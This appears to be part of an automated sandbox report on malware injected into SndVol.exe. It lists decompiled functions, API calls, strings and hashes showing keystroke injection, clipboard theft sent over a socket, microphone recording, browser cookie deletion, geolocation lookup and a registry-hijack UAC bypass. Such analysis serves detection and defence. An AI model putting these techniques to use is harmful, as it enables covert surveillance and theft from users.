MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,0042BAB6,?,?,?,00447215,00000001,00000001,?), ref: 0044701E
__alloca_probe_16.LIBCMT ref: 00447056
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,0042BAB6,?,?,?,00447215,00000001,00000001,?), ref: 004470A4
__alloca_probe_16.LIBCMT ref: 0044713B
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0044719E
__freea.LIBCMT ref: 004471AB

Part of subcall function 00443649: RtlAllocateHeap.NTDLL(00000000,00433049,?,P@,004365E7,?,?,00000000,?,P@,0040C88A,00433049,?,?,?,?), ref: 0044367B

__freea.LIBCMT ref: 004471B4
__freea.LIBCMT ref: 004471D9

Memory Dump Source

Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
String ID:
API String ID: 3864826663-0
Opcode ID: 429851ce6ab608a1373ea908d8fe5c2358bbda3d7f1dde4b5ad8663d45493dac
Instruction ID: 54c76e5b98bc3e662f405ec50a570bffd16f8396d3d33e450f7b83ec1f761fab
Opcode Fuzzy Hash: 429851ce6ab608a1373ea908d8fe5c2358bbda3d7f1dde4b5ad8663d45493dac
Instruction Fuzzy Hash: C051F372604216AFFB258F65CC81EAF77A9EB44754F19422EFC04D6340EB38DC4296A8

Function 00417949 Relevance: 12.1, APIs: 8, Instructions: 102keyboardCOMMON

Download Yara Rule

APIs

SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 00417982
SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 004179A3
SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 004179C3
SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 004179D7
SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 004179ED
SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 00417A0A
SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 00417A25
SendInput.USER32(00000001,?,0000001C,?,00000000), ref: 00417A41

Memory Dump Source

Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: InputSend
String ID:
API String ID: 3431551938-0
Opcode ID: 6aaf5890e5c1829a4f0a9f9de961f2057ca44ae286fc2f2a8f4f79c9cdb01491
Instruction ID: 18205c9a4f61e0979ba7f31da2e0396e133b47f61cec1eebe1044e0c870e5742
Opcode Fuzzy Hash: 6aaf5890e5c1829a4f0a9f9de961f2057ca44ae286fc2f2a8f4f79c9cdb01491
Instruction Fuzzy Hash: BF3180715583086EE311CF51D941BEBBFECEF99B54F00080FF6809A191D2A696C98BA7

Function 00414F40 Relevance: 12.0, APIs: 8, Instructions: 49clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 00414F41
EmptyClipboard.USER32 ref: 00414F4F
CloseClipboard.USER32 ref: 00414F55
OpenClipboard.USER32 ref: 00414F5C
GetClipboardData.USER32(0000000D), ref: 00414F6C
GlobalLock.KERNEL32(00000000), ref: 00414F75
GlobalUnlock.KERNEL32(00000000), ref: 00414F7E
CloseClipboard.USER32 ref: 00414F84

Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16

Memory Dump Source

Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
String ID:
API String ID: 2172192267-0
Opcode ID: e25419e6d8039f906f8e35a39bb69e24259a120ac2af4df386a8ba427cdc1a67
Instruction ID: b342c93700c1c5b5557293b3c64df63ecfc3f94f93ee8c928ebb46f035b43356
Opcode Fuzzy Hash: e25419e6d8039f906f8e35a39bb69e24259a120ac2af4df386a8ba427cdc1a67
Instruction Fuzzy Hash: 7C015E312443009BD314BF71DC596AA76A8EBE0346F81057EB94A931A3DF3899498A9A

Function 04927457 Relevance: 10.9, APIs: 7, Instructions: 370timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 049274D9
_free.LIBCMT ref: 049274FD
_free.LIBCMT ref: 04927684
GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045C1E4), ref: 04927696
WideCharToMultiByte.KERNEL32(00000000,00000000,0046F754,000000FF,00000000,0000003F,00000000,?,?), ref: 0492770E
WideCharToMultiByte.KERNEL32(00000000,00000000,0046F7A8,000000FF,?,0000003F,00000000,?), ref: 0492773B
_free.LIBCMT ref: 04927850

Memory Dump Source

Source File: 00000009.00000002.3762836955.00000000048E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 048E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_48e0000_SndVol.jbxd

Yara matches

Similarity

API ID: _free$ByteCharMultiWide$InformationTimeZone
String ID:
API String ID: 314583886-0
Opcode ID: cbe724d584c4c688f7c92c89d2af3aac564bebe5498eb7e7b8226ac0d6f42e00
Instruction ID: 37f879013edbabfadc139084e7af467b539708099db1e81021e1bb970828a61e
Opcode Fuzzy Hash: cbe724d584c4c688f7c92c89d2af3aac564bebe5498eb7e7b8226ac0d6f42e00
Instruction Fuzzy Hash: 9AC12A71900265AFEB20DFF89E40AAEBBADEF81314F1405FAD485A7258E730AE45C751

Function 00447757 Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,00447ECC,00453EB5,00000000,00000000,00000000,00000000,00000000), ref: 00447799
__fassign.LIBCMT ref: 00447814
__fassign.LIBCMT ref: 0044782F
WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 00447855
WriteFile.KERNEL32(?,00000000,00000000,00447ECC,00000000,?,?,?,?,?,?,?,?,?,00447ECC,00453EB5), ref: 00447874
WriteFile.KERNEL32(?,00453EB5,00000001,00447ECC,00000000,?,?,?,?,?,?,?,?,?,00447ECC,00453EB5), ref: 004478AD

Memory Dump Source

Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: a748b16374f527b7a80cf69ed727348adf3f69da4df0249be72511d103bd3332
Instruction ID: 74b5e8c6f427b63fe2026e60454d3d85c0c1d9029b0a2cc1a9ecb7a500eaa1fe
Opcode Fuzzy Hash: a748b16374f527b7a80cf69ed727348adf3f69da4df0249be72511d103bd3332
Instruction Fuzzy Hash: 32510870E042499FEB10DFA8DC85AEEBBF8EF09300F14416BE951E7291E7749941CB69

Function 049284EF Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,04928C64,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 04928531
__fassign.LIBCMT ref: 049285AC
__fassign.LIBCMT ref: 049285C7
WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 049285ED
WriteFile.KERNEL32(?,FF8BC35D,00000000,04928C64,00000000,?,?,?,?,?,?,?,?,?,04928C64,?), ref: 0492860C
WriteFile.KERNEL32(?,?,00000001,04928C64,00000000,?,?,?,?,?,?,?,?,?,04928C64,?), ref: 04928645

Memory Dump Source

Source File: 00000009.00000002.3762836955.00000000048E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 048E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_48e0000_SndVol.jbxd

Yara matches

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: 974bdd1760e1fbed972c8c26fb927694832cee583c2e15cdbcc7b5b1c3d61954
Instruction ID: acda0ddb405abada737a86e1f99a3a226c0e9d9c45ed1812614d8949e2ceaeb6
Opcode Fuzzy Hash: 974bdd1760e1fbed972c8c26fb927694832cee583c2e15cdbcc7b5b1c3d61954
Instruction Fuzzy Hash: 28511A70A002159FDB10DFA8D944AEEBBF8EF08300F15467AE955E7251E770EA45CBA4

Function 048E5640 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 144networkCOMMON

Download Yara Rule

APIs

connect.WS2_32(?,00000000,00000000), ref: 048E5658
CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 048E5778
CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 048E5786
WSAGetLastError.WS2_32 ref: 048E5799

Part of subcall function 048FA272: GetLocalTime.KERNEL32(00000000), ref: 048FA28C

Strings

Connection Failed: , xrefs: 048E57BB
TLS Handshake... | , xrefs: 048E567C

Memory Dump Source

Source File: 00000009.00000002.3762836955.00000000048E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 048E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_48e0000_SndVol.jbxd

Yara matches

Similarity

API ID: CreateEvent$ErrorLastLocalTimeconnect
String ID: Connection Failed: $TLS Handshake... |
API String ID: 994465650-1510355367
Opcode ID: b56ab407b7d85cc5e8983cef37c9724a1f5c45cc3ea0a996f87df1f4b9ef746f
Instruction ID: 7c55a2b5e56723eb234e7574eda5ad6f996ecc502905b2018659406f461e5861
Opcode Fuzzy Hash: b56ab407b7d85cc5e8983cef37c9724a1f5c45cc3ea0a996f87df1f4b9ef746f
Instruction Fuzzy Hash: A4410A21B006117BEA187BBECD1693D7725AB43258B400F59D502C3691FFE6BD2187D7

Function 00401CEB Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 89COMMON

Download Yara Rule

APIs

_strftime.LIBCMT ref: 00401D30

Part of subcall function 00401A4D: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AB9

waveInUnprepareHeader.WINMM(0046FA78,00000020,00000000,?), ref: 00401DE2
waveInPrepareHeader.WINMM(0046FA78,00000020), ref: 00401E20
waveInAddBuffer.WINMM(0046FA78,00000020), ref: 00401E2F

Strings

%Y-%m-%d %H.%M, xrefs: 00401D21
.wav, xrefs: 00401D49

Memory Dump Source

Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
String ID: %Y-%m-%d %H.%M$.wav
API String ID: 3809562944-3597965672
Opcode ID: 6970773257d7bd6b4a9ad9b6f82f9bce4b3c1b2460946ca6bb168bdaee054684
Instruction ID: eb6f517cf981021e41f9baa65c06222081641aa24e02a1e4c78245b08a68fc14
Opcode Fuzzy Hash: 6970773257d7bd6b4a9ad9b6f82f9bce4b3c1b2460946ca6bb168bdaee054684
Instruction Fuzzy Hash: 743150315043009BC314EBA1EC56A9E77E8FB54318F50893EF599A21F2EFB49909CB5E

Function 0040AE2A Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 87COMMON

Download Yara Rule

APIs

Part of subcall function 00411F91: RegOpenKeyExA.KERNEL32(80000002,00000400,00000000,00020019,?), ref: 00411FB5
Part of subcall function 00411F91: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 00411FD2
Part of subcall function 00411F91: RegCloseKey.KERNEL32(?), ref: 00411FDD

ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040AEAC
PathFileExistsA.SHLWAPI(?), ref: 0040AEB9

Strings

Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders, xrefs: 0040AE43
[IE cookies not found], xrefs: 0040AE81
[IE cookies cleared!], xrefs: 0040AF06, 0040AF2B
Cookies, xrefs: 0040AE3E

Memory Dump Source

Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
API String ID: 1133728706-4073444585
Opcode ID: 13b02dafbbb2df2509005d2ea6d237cbb7e060283ac4043076e9ae9448562644
Instruction ID: 9e227284a7a69f00510d3be81dd7cde1580ac9a58a9ca8fbd928e09bf644cbd9
Opcode Fuzzy Hash: 13b02dafbbb2df2509005d2ea6d237cbb7e060283ac4043076e9ae9448562644
Instruction Fuzzy Hash: CF21B170A4020556CB00FBE2CC97DEE7368AF51348F80013FB901772D2EB795A45C6DA

Function 00453D2D Relevance: 10.6, APIs: 7, Instructions: 80COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0fe7a57eeb80513b7b5fe64b1e34abf19149bc3f23fae782b0bf022f83ee5f09
Instruction ID: 106e2cecea33a690a52cc41c1271e31c3df1f85e8271d36c5dacef07d135bc52
Opcode Fuzzy Hash: 0fe7a57eeb80513b7b5fe64b1e34abf19149bc3f23fae782b0bf022f83ee5f09
Instruction Fuzzy Hash: 2C113232504214BBCB213F769C0596B7B7CDF857A7F11062BFC1583292DA38C9089269

Function 048E743E Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 78COMMON

Download Yara Rule

APIs

ShellExecuteW.SHELL32(00000000,004630AC,00000000,00469654,00469654,00000000), ref: 048E750D
ExitProcess.KERNEL32 ref: 048E751A

Strings

Software\Classes\mscfile\shell\open\command, xrefs: 048E74D7
H"G, xrefs: 048E7480
C:\Windows\SysWOW64\SndVol.exe, xrefs: 048E74C8
origmsc, xrefs: 048E74A8

Memory Dump Source

Source File: 00000009.00000002.3762836955.00000000048E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 048E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_48e0000_SndVol.jbxd

Yara matches

Similarity

API ID: ExecuteExitProcessShell
String ID: C:\Windows\SysWOW64\SndVol.exe$H"G$Software\Classes\mscfile\shell\open\command$origmsc
API String ID: 1124553745-1559122629
Opcode ID: 8e5fad59d86c60b71b0e885ed10285bbf14514be7c7ad01d69b843f0820051ef
Instruction ID: 4b03cb411f6e22ab93019473aa06901611a3d5230657dfca2bcc54ff38ae1137
Opcode Fuzzy Hash: 8e5fad59d86c60b71b0e885ed10285bbf14514be7c7ad01d69b843f0820051ef
Instruction Fuzzy Hash: DE110B61A441056AF714B769EC12FBE3258DB02B05F100A59EA05E60C1FED47A0982DB

Function 0041936B Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 69networkfileCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00419392
InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 004193A8
InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 004193C1
InternetCloseHandle.WININET(00000000), ref: 00419407
InternetCloseHandle.WININET(00000000), ref: 0041940A

Strings

http://geoplugin.net/json.gp, xrefs: 004193A2

Memory Dump Source

Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleOpen$FileRead
String ID: http://geoplugin.net/json.gp
API String ID: 3121278467-91888290
Opcode ID: 7fcb56876af0f522e84ab7e8d8f64b5881d67df2ffb9a695aea30fd6e424dab6
Instruction ID: 9fad89c028030122b1819b6a874fefb9d729214f45c39af6bed7b2b06c6e4f32
Opcode Fuzzy Hash: 7fcb56876af0f522e84ab7e8d8f64b5881d67df2ffb9a695aea30fd6e424dab6
Instruction Fuzzy Hash: 3311C8311053126BD224EF169C59DABBF9CEF85765F40053EF905A32C1DBA8DC44C6A9

Function 0044E0DA Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0044DE21: _free.LIBCMT ref: 0044DE4A

_free.LIBCMT ref: 0044E128

Part of subcall function 00443C92: HeapFree.KERNEL32(00000000,00000000,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?), ref: 00443CA8
Part of subcall function 00443C92: GetLastError.KERNEL32(?,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?,?), ref: 00443CBA

_free.LIBCMT ref: 0044E133
_free.LIBCMT ref: 0044E13E
_free.LIBCMT ref: 0044E192
_free.LIBCMT ref: 0044E19D
_free.LIBCMT ref: 0044E1A8
_free.LIBCMT ref: 0044E1B3

Memory Dump Source

Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: d645742a9f031bfd4c53cfe37fe00a001808073c56fe889b6c8b285726f20831
Instruction ID: b65b67035ea7ffc6fe2c1778d32cb4f6cbb79ca162155871331ff7aa41bb66fd
Opcode Fuzzy Hash: d645742a9f031bfd4c53cfe37fe00a001808073c56fe889b6c8b285726f20831
Instruction Fuzzy Hash: 64111571940B08AAE520BFF2CC47FCBB7DC9F14708F50882EB29D6A552DA7DB6044654

Function 004380FA Relevance: 10.6, APIs: 7, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,004380F1,0043705E), ref: 00438108
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00438116
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043812F
SetLastError.KERNEL32(00000000,?,004380F1,0043705E), ref: 00438181

Memory Dump Source

Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 8fa3eba41d5dfcfa025b4cdbc1becdc984892f6557d94f52d480fd9577c81c63
Instruction ID: 5a832d73688d02476ca7511e273f3515cfb573674d76dbd3fe9934521fa1a72b
Opcode Fuzzy Hash: 8fa3eba41d5dfcfa025b4cdbc1becdc984892f6557d94f52d480fd9577c81c63
Instruction Fuzzy Hash: F101283210C3326EAA102F767C85A1BAA94EB09779F31633FF214951E1FFA99C02550C

Function 0040A9E2 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 49fileCOMMON

Download Yara Rule

APIs

DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040AA1E
GetLastError.KERNEL32 ref: 0040AA28

Strings

[Chrome Cookies not found], xrefs: 0040AA42
UserProfile, xrefs: 0040A9EE
\AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040A9E9
[Chrome Cookies found, cleared!], xrefs: 0040AA4E

Memory Dump Source

Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: DeleteErrorFileLast
String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
API String ID: 2018770650-304995407
Opcode ID: 72959d3c99de93e4222bab9abc487c3734757a9235bfdd9193e44ef0947d1452
Instruction ID: 1f34f6daae66b163f55af04f15e1d0b60933b3567ae099988c08ef58cbd90c9e
Opcode Fuzzy Hash: 72959d3c99de93e4222bab9abc487c3734757a9235bfdd9193e44ef0947d1452
Instruction Fuzzy Hash: 0E01F731B4020467C6047A75DD278AE77249951304B50057FF402773D2FD798915CA9F

Function 00418D76 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 30sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4

GetModuleHandleA.KERNEL32(00000000,00020009), ref: 00418DA8
PlaySoundW.WINMM(00000000,00000000), ref: 00418DB6
Sleep.KERNEL32(00002710), ref: 00418DBD
PlaySoundW.WINMM(00000000,00000000,00000000), ref: 00418DC6

Strings

`ou, xrefs: 00418DA8
Alarm triggered, xrefs: 00418D7F

Memory Dump Source

Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: PlaySound$HandleLocalModuleSleepTime
String ID: Alarm triggered$`ou
API String ID: 614609389-1879314875
Opcode ID: f3b2e6a196e006c08730a50f46cf1091306eb2f4cb3f358d521c73ccadf31b21
Instruction ID: 312fa8acbc24107594bc9953998d05cc744500d2263fe9839a2dc32143519282
Opcode Fuzzy Hash: f3b2e6a196e006c08730a50f46cf1091306eb2f4cb3f358d521c73ccadf31b21
Instruction Fuzzy Hash: 9EE01226E4026037A510376A6D0FC6F2D2DDBD3B6274501AFFA04571D2D9A4080186FF

Function 0043887C Relevance: 9.3, APIs: 6, Instructions: 284COMMON

Download Yara Rule

APIs

__allrem.LIBCMT ref: 00438A09
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00438A25
__allrem.LIBCMT ref: 00438A3C
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00438A5A
__allrem.LIBCMT ref: 00438A71
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00438A8F

Memory Dump Source

Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
String ID:
API String ID: 1992179935-0
Opcode ID: e54fcd2a271a95563de48233a52a921a5b89548056e17f80f76cd68e5be4f8c8
Instruction ID: 1db505a437643d25cad1e1ab06004ebe691486694b679651004c0d70fbe8f9c1
Opcode Fuzzy Hash: e54fcd2a271a95563de48233a52a921a5b89548056e17f80f76cd68e5be4f8c8
Instruction Fuzzy Hash: CD815972A007069BE724BA29CC41B6BF3E8AF49328F14512FF511D6382EF78D900875D

Function 04919614 Relevance: 9.3, APIs: 6, Instructions: 284COMMON

Download Yara Rule

APIs

__allrem.LIBCMT ref: 049197A1
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 049197BD
__allrem.LIBCMT ref: 049197D4
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 049197F2
__allrem.LIBCMT ref: 04919809
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04919827

Memory Dump Source

Source File: 00000009.00000002.3762836955.00000000048E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 048E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_48e0000_SndVol.jbxd

Yara matches

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
String ID:
API String ID: 1992179935-0
Opcode ID: e54fcd2a271a95563de48233a52a921a5b89548056e17f80f76cd68e5be4f8c8
Instruction ID: 82ddc257dd7a2f3be11cd87678f9bbc0f86b58e34d0e9711ffe3baa5e1c03626
Opcode Fuzzy Hash: e54fcd2a271a95563de48233a52a921a5b89548056e17f80f76cd68e5be4f8c8
Instruction Fuzzy Hash: 3D81E6B2A0071AABF7249E68CC51B6A73EDAFC5768F14453AE511D72A0E774F900CB90

Function 00442E0B Relevance: 9.2, APIs: 6, Instructions: 200COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftoe.LIBCMT ref: 00442E37
__cftoe.LIBCMT ref: 00442E69

Memory Dump Source

Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: __cftoe
String ID:
API String ID: 4189289331-0
Opcode ID: fe175afe76c71e94f48f18de2ff8b7888fd4a3d5f0ced9f470ddb34fbb41f910
Instruction ID: 4563a9c63fae0d6d7f7aa9a83d474a3ec136fb2d14012502de5dff0b8c27d610
Opcode Fuzzy Hash: fe175afe76c71e94f48f18de2ff8b7888fd4a3d5f0ced9f470ddb34fbb41f910
Instruction Fuzzy Hash: CB510C32500205ABFB209F598E45EAF77B8EF48334FE0421FF415D6282EB79D941966C

Function 00444A81 Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 389COMMONLIBRARYCODE

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 00444B89
__freea.LIBCMT ref: 00444C33
__freea.LIBCMT ref: 00444C51

Part of subcall function 00433BED: _free.LIBCMT ref: 00433C03

Strings

am/pm, xrefs: 00444CB4
a/p, xrefs: 00444D18

Memory Dump Source

Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: __freea$__alloca_probe_16_free
String ID: a/p$am/pm
API String ID: 2936374016-3206640213
Opcode ID: 86a94caed32ed52714acf924ceafe093e183b69c7042c505462fc06ec8b16e5d
Instruction ID: 5910b70c00eb86a61931efff1dda8232d7c1eee9eff2524394b85f82b3a3e216
Opcode Fuzzy Hash: 86a94caed32ed52714acf924ceafe093e183b69c7042c505462fc06ec8b16e5d
Instruction Fuzzy Hash: 05D1E171900206CAFB289F68C895BBBB7B1FF85300F29415BE905AB391D73D9D81CB59

Function 0040F8B7 Relevance: 9.1, APIs: 6, Instructions: 75COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0040F8C4
int.LIBCPMT ref: 0040F8D7

Part of subcall function 0040CAE9: std::_Lockit::_Lockit.LIBCPMT ref: 0040CAFA
Part of subcall function 0040CAE9: std::_Lockit::~_Lockit.LIBCPMT ref: 0040CB14

std::_Facet_Register.LIBCPMT ref: 0040F917
std::_Lockit::~_Lockit.LIBCPMT ref: 0040F920
__CxxThrowException@8.LIBVCRUNTIME ref: 0040F93E
__Init_thread_footer.LIBCMT ref: 0040F97F

Memory Dump Source

Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_Init_thread_footerRegisterThrow
String ID:
API String ID: 3815856325-0
Opcode ID: 884822b495c0d911e7e6d260955d18b9f199f61a7b6913d9d71a9645d575b0f3
Instruction ID: 3bb9722abb9e04fd13c8d4025e7ce1c878c76566b3017ce531706a3e1b7c3414
Opcode Fuzzy Hash: 884822b495c0d911e7e6d260955d18b9f199f61a7b6913d9d71a9645d575b0f3
Instruction Fuzzy Hash: 90212232900104EBCB24EBA9E94699E7378AB08324F20017FF844B72D1DB389F458BD9

Function 048F064F Relevance: 9.1, APIs: 6, Instructions: 75COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 048F065C
int.LIBCPMT ref: 048F066F

Part of subcall function 048ED881: std::_Lockit::_Lockit.LIBCPMT ref: 048ED892
Part of subcall function 048ED881: std::_Lockit::~_Lockit.LIBCPMT ref: 048ED8AC

std::_Facet_Register.LIBCPMT ref: 048F06AF
std::_Lockit::~_Lockit.LIBCPMT ref: 048F06B8
__CxxThrowException@8.LIBVCRUNTIME ref: 048F06D6
__Init_thread_footer.LIBCMT ref: 048F0717

Memory Dump Source

Source File: 00000009.00000002.3762836955.00000000048E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 048E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_48e0000_SndVol.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_Init_thread_footerRegisterThrow
String ID:
API String ID: 3815856325-0
